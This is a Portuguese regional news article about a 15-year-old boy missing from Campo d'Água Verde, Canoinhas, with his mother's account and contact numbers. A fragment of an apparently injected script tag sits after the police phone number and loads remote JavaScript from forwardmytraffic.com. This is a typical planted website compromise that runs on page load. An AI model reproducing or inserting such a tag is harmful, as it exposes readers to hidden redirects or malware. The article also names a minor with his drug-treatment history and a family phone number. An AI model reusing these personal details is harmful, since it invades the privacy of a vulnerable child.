InícioPolíciaMenino de 15 anos, de Canoinhas, está desaparecido há quatro dias

Menino de 15 anos, de Canoinhas, está desaparecido há quatro dias

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

A rotina de Adriana Ortiz tem sido de desespero desde a sexta-feira, 12. Rafael Murilo Souza Ortiz do Valle, seu filho de 15 anos saiu de casa, no distrito canoinhense do Campo d’Água Verde, para visitar um amigo que mora na esquina de sua rua e desde então desapareceu. O amigo contou que ele chegou a sua casa, ficou um tempo, mas saiu prometendo voltar logo. Desde então, desapareceu.

 

 

Adriana conta que o filho já foi internado por problemas com drogas e que teme que seu desparecimento esteja ligado a isso. Ela já recebeu inúmeras mensagens afirmando que ele foi visto no distrito tresbarrense do São Cristóvão e no bairro Piedade. “Soube que ele estava envolvido com uma menina no São Cristóvão”, contou Adriana. Quando se preparava para ir até o distrito a fim de checar se a informação de que ele estaria com essa menina no distrito confere.

 

Quando Rafael desapareceu ele usava jaqueta preta, camiseta roxa, calça jeans escura e chinelo preto.

Quem tiver informações sobre seu paradeiro pode entrar em contato com Adriana pelo telefone/WhatsApp (47) 991851327 ou com a Polícia Civil pelo telefone/WhatsApp (47) 9 9932 8677…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.